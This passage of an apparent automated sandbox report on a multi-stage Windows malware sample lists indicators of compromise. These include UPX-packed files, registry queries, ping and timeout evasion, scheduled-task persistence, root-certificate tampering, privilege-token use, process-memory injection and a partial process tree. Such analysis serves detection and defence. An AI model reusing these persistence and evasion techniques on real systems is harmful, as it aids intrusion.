File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe	cmd.exe
File opened for modification	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe
File created	C:\Windows\system32\WinBioData\WindowsDataUpdater.exe	cmd.exe

UPX packed file 32 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/756-589-0x000007FEED960000-0x000007FEEDDC5000-memory.dmp	upx
behavioral1/memory/1700-661-0x000007FEEBD60000-0x000007FEEC1C5000-memory.dmp	upx
behavioral1/memory/2924-821-0x000007FEEB8F0000-0x000007FEEBD55000-memory.dmp	upx
behavioral1/files/0x000400000001d71a-830.dat	upx
behavioral1/files/0x000400000001d718-829.dat	upx
behavioral1/files/0x000400000001d716-828.dat	upx
behavioral1/files/0x000400000001d7b2-838.dat	upx
behavioral1/files/0x000400000001d75c-837.dat	upx
behavioral1/files/0x000400000001d754-836.dat	upx
behavioral1/files/0x000400000001d72b-835.dat	upx
behavioral1/files/0x000400000001d722-834.dat	upx
behavioral1/files/0x000400000001d71e-833.dat	upx
behavioral1/files/0x000400000001d9da-880.dat	upx
behavioral1/files/0x000400000001d9d7-879.dat	upx
behavioral1/files/0x000400000001d9dc-881.dat	upx
behavioral1/files/0x000400000001d9de-882.dat	upx
behavioral1/files/0x000400000001d9ea-888.dat	upx
behavioral1/files/0x000400000001d9e6-886.dat	upx
behavioral1/files/0x000400000001d9e4-885.dat	upx
behavioral1/memory/2284-889-0x000007FEEB480000-0x000007FEEB8E5000-memory.dmp	upx
behavioral1/memory/1500-955-0x000007FEEB010000-0x000007FEEB475000-memory.dmp	upx
behavioral1/memory/2452-1021-0x000007FEEABA0000-0x000007FEEB005000-memory.dmp	upx
behavioral1/memory/1532-1087-0x000007FEEA730000-0x000007FEEAB95000-memory.dmp	upx
behavioral1/memory/2020-1153-0x000007FEEA2C0000-0x000007FEEA725000-memory.dmp	upx
behavioral1/memory/1960-1272-0x000007FEE9E50000-0x000007FEEA2B5000-memory.dmp	upx
behavioral1/memory/2500-1339-0x000007FEE98E0000-0x000007FEE9D45000-memory.dmp	upx
behavioral1/memory/2840-1406-0x000007FEE9370000-0x000007FEE97D5000-memory.dmp	upx
behavioral1/memory/2612-1474-0x000007FEE8CD0000-0x000007FEE9135000-memory.dmp	upx
behavioral1/memory/2216-1549-0x000007FEE8860000-0x000007FEE8CC5000-memory.dmp	upx
behavioral1/memory/1772-1617-0x000007FEE82F0000-0x000007FEE8755000-memory.dmp	upx
behavioral1/memory/2036-1684-0x000007FEE7E80000-0x000007FEE82E5000-memory.dmp	upx
behavioral1/memory/3068-1751-0x000007FEE7A10000-0x000007FEE7E75000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client-built.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WEBDOWN.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bugs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whats-new.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	roIrMC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jeditor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qNVQKFyM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jeditor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	temp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 12 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4992	Process not Found
1360	PING.EXE
1724	PING.EXE
444	PING.EXE
848	PING.EXE
3096	PING.EXE
4740	PING.EXE
2608	PING.EXE
2328	PING.EXE
1616	PING.EXE
2560	PING.EXE
4848	PING.EXE

Delays execution with timeout.exe 64 IoCs

defense_evasion

pid	Process
2492	timeout.exe
348	timeout.exe
4008	timeout.exe
2000	timeout.exe
1984	timeout.exe
916	timeout.exe
3668	timeout.exe
4752	timeout.exe
4948	timeout.exe
2792	timeout.exe
4036	timeout.exe
4028	timeout.exe
3920	timeout.exe
3160	timeout.exe
4872	Process not Found
2584	timeout.exe
3508	timeout.exe
3136	timeout.exe
2056	timeout.exe
2084	timeout.exe
444	timeout.exe
3120	timeout.exe
2932	timeout.exe
2804	timeout.exe
2480	timeout.exe
1912	timeout.exe
2864	timeout.exe
3244	timeout.exe
4724	timeout.exe
4880	timeout.exe
1012	timeout.exe
3288	timeout.exe
2028	timeout.exe
3088	timeout.exe
1896	timeout.exe
4064	timeout.exe
3612	timeout.exe
3524	timeout.exe
3704	timeout.exe
3540	timeout.exe
2544	timeout.exe
3228	timeout.exe
2800	timeout.exe
2692	timeout.exe
1300	timeout.exe
2676	timeout.exe
2952	timeout.exe
4500	timeout.exe
4012	timeout.exe
2724	timeout.exe
2516	timeout.exe
2908	timeout.exe
2516	timeout.exe
3840	timeout.exe
3280	timeout.exe
1444	timeout.exe
336	timeout.exe
1980	timeout.exe
4944	timeout.exe
3212	timeout.exe
2952	timeout.exe
2576	timeout.exe
4664	timeout.exe
2372	timeout.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies system certificate store 2 TTPs 4 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	._cache_Synaptics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	._cache_Synaptics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	._cache_Synaptics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	._cache_Synaptics.exe

Runs ping.exe 1 TTPs 12 IoCs

Remote System Discovery

T1018

pid	Process
1360	PING.EXE
1724	PING.EXE
2560	PING.EXE
848	PING.EXE
3096	PING.EXE
4848	PING.EXE
4992	Process not Found
2608	PING.EXE
2328	PING.EXE
1616	PING.EXE
444	PING.EXE
4740	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4032	schtasks.exe
2460	schtasks.exe
4704	schtasks.exe
4312	schtasks.exe
1608	schtasks.exe
2484	schtasks.exe
2364	schtasks.exe
2988	schtasks.exe
2268	schtasks.exe
1324	schtasks.exe
4220	schtasks.exe
2232	schtasks.exe
2696	schtasks.exe
4312	schtasks.exe
264	schtasks.exe
2108	schtasks.exe
700	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1556	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2908	Discord2.exe
2908	Discord2.exe
2908	Discord2.exe
1860	temp.exe
1860	temp.exe
1860	temp.exe
2780	svchost.exe
2780	svchost.exe
3784	powershell.exe
4164	powershell.exe
4416	powershell.exe
4288	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	552	._cache_4363463463464363463463463.exe
Token: SeDebugPrivilege	2596	._cache_Synaptics.exe
Token: SeDebugPrivilege	2908	Discord2.exe
Token: SeDebugPrivilege	2404	Discord.exe
Token: SeDebugPrivilege	2404	Discord.exe
Token: SeDebugPrivilege	1908	skibidi.exe
Token: SeDebugPrivilege	2792	Client.exe
Token: SeDebugPrivilege	1860	temp.exe
Token: SeDebugPrivilege	2316	roIrMC.exe
Token: SeDebugPrivilege	2376	Client.exe
Token: SeDebugPrivilege	1464	Client.exe
Token: SeDebugPrivilege	2356	Client-built.exe
Token: SeDebugPrivilege	2780	svchost.exe
Token: SeDebugPrivilege	1412	WindowsDataUpdater.exe
Token: SeDebugPrivilege	688	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2036	Client.exe
Token: SeDebugPrivilege	1608	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2760	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1052	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3000	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1772	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2492	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2232	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1684	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3000	WindowsDataUpdater.exe
Token: SeDebugPrivilege	932	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1472	Client.exe
Token: SeDebugPrivilege	1924	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1636	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2628	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1912	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2492	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2556	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2292	WindowsDataUpdater.exe
Token: SeDebugPrivilege	900	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1616	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1512	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1932	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2824	Client.exe
Token: SeDebugPrivilege	1536	WindowsDataUpdater.exe
Token: SeDebugPrivilege	700	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2932	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3360	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3776	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3004	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3480	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3936	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3196	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2144	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1624	Client.exe
Token: SeDebugPrivilege	3156	WindowsDataUpdater.exe
Token: SeDebugPrivilege	4088	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3040	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3904	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3896	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3616	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1624	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3284	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3280	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3328	WindowsDataUpdater.exe
Token: SeDebugPrivilege	1880	Client.exe
Token: SeDebugPrivilege	2936	WindowsDataUpdater.exe
Token: SeDebugPrivilege	2408	WindowsDataUpdater.exe
Token: SeDebugPrivilege	3608	WindowsDataUpdater.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1556	EXCEL.EXE
1412	WindowsDataUpdater.exe
3304	qNVQKFyM.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2760 wrote to memory of 552	2760	4363463463464363463463463.exe	31
PID 2760 wrote to memory of 552	2760	4363463463464363463463463.exe	31
PID 2760 wrote to memory of 552	2760	4363463463464363463463463.exe	31
PID 2760 wrote to memory of 552	2760	4363463463464363463463463.exe	31
PID 2760 wrote to memory of 2656	2760	4363463463464363463463463.exe	33
PID 2760 wrote to memory of 2656	2760	4363463463464363463463463.exe	33
PID 2760 wrote to memory of 2656	2760	4363463463464363463463463.exe	33
PID 2760 wrote to memory of 2656	2760	4363463463464363463463463.exe	33
PID 2656 wrote to memory of 2596	2656	Synaptics.exe	34
PID 2656 wrote to memory of 2596	2656	Synaptics.exe	34
PID 2656 wrote to memory of 2596	2656	Synaptics.exe	34
PID 2656 wrote to memory of 2596	2656	Synaptics.exe	34
PID 2596 wrote to memory of 2908	2596	._cache_Synaptics.exe	38
PID 2596 wrote to memory of 2908	2596	._cache_Synaptics.exe	38
PID 2596 wrote to memory of 2908	2596	._cache_Synaptics.exe	38
PID 2596 wrote to memory of 2908	2596	._cache_Synaptics.exe	38
PID 2908 wrote to memory of 2972	2908	Discord2.exe	40
PID 2908 wrote to memory of 2972	2908	Discord2.exe	40
PID 2908 wrote to memory of 2972	2908	Discord2.exe	40
PID 2908 wrote to memory of 2972	2908	Discord2.exe	40
PID 2908 wrote to memory of 2196	2908	Discord2.exe	42
PID 2908 wrote to memory of 2196	2908	Discord2.exe	42
PID 2908 wrote to memory of 2196	2908	Discord2.exe	42
PID 2908 wrote to memory of 2196	2908	Discord2.exe	42
PID 2972 wrote to memory of 2232	2972	cmd.exe	44
PID 2972 wrote to memory of 2232	2972	cmd.exe	44
PID 2972 wrote to memory of 2232	2972	cmd.exe	44
PID 2972 wrote to memory of 2232	2972	cmd.exe	44
PID 2196 wrote to memory of 1896	2196	cmd.exe	45
PID 2196 wrote to memory of 1896	2196	cmd.exe	45
PID 2196 wrote to memory of 1896	2196	cmd.exe	45
PID 2196 wrote to memory of 1896	2196	cmd.exe	45
PID 2196 wrote to memory of 2404	2196	cmd.exe	46
PID 2196 wrote to memory of 2404	2196	cmd.exe	46
PID 2196 wrote to memory of 2404	2196	cmd.exe	46
PID 2196 wrote to memory of 2404	2196	cmd.exe	46
PID 552 wrote to memory of 2624	552	._cache_4363463463464363463463463.exe	47
PID 552 wrote to memory of 2624	552	._cache_4363463463464363463463463.exe	47
PID 552 wrote to memory of 2624	552	._cache_4363463463464363463463463.exe	47
PID 552 wrote to memory of 2624	552	._cache_4363463463464363463463463.exe	47
PID 2596 wrote to memory of 1908	2596	._cache_Synaptics.exe	48
PID 2596 wrote to memory of 1908	2596	._cache_Synaptics.exe	48
PID 2596 wrote to memory of 1908	2596	._cache_Synaptics.exe	48
PID 2596 wrote to memory of 1908	2596	._cache_Synaptics.exe	48
PID 552 wrote to memory of 1212	552	._cache_4363463463464363463463463.exe	49
PID 552 wrote to memory of 1212	552	._cache_4363463463464363463463463.exe	49
PID 552 wrote to memory of 1212	552	._cache_4363463463464363463463463.exe	49
PID 552 wrote to memory of 1212	552	._cache_4363463463464363463463463.exe	49
PID 552 wrote to memory of 1860	552	._cache_4363463463464363463463463.exe	50
PID 552 wrote to memory of 1860	552	._cache_4363463463464363463463463.exe	50
PID 552 wrote to memory of 1860	552	._cache_4363463463464363463463463.exe	50
PID 552 wrote to memory of 1860	552	._cache_4363463463464363463463463.exe	50
PID 1908 wrote to memory of 264	1908	skibidi.exe	51
PID 1908 wrote to memory of 264	1908	skibidi.exe	51
PID 1908 wrote to memory of 264	1908	skibidi.exe	51
PID 1908 wrote to memory of 2792	1908	skibidi.exe	53
PID 1908 wrote to memory of 2792	1908	skibidi.exe	53
PID 1908 wrote to memory of 2792	1908	skibidi.exe	53
PID 2792 wrote to memory of 2696	2792	Client.exe	54
PID 2792 wrote to memory of 2696	2792	Client.exe	54
PID 2792 wrote to memory of 2696	2792	Client.exe	54
PID 2792 wrote to memory of 2808	2792	Client.exe	56
PID 2792 wrote to memory of 2808	2792	Client.exe	56
PID 2792 wrote to memory of 2808	2792	Client.exe	56

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
PID:596
- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
  "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
  2⤵
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:1556

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2760
- C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe"
  2⤵
  - Downloads MZ/PE file
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:552
- - C:\Users\Admin\AppData\Local\Temp\Files\MajesticExec.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\MajesticExec.exe"
    3⤵
    - Executes dropped EXE
    PID:2624
- - C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1212
  - - C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE
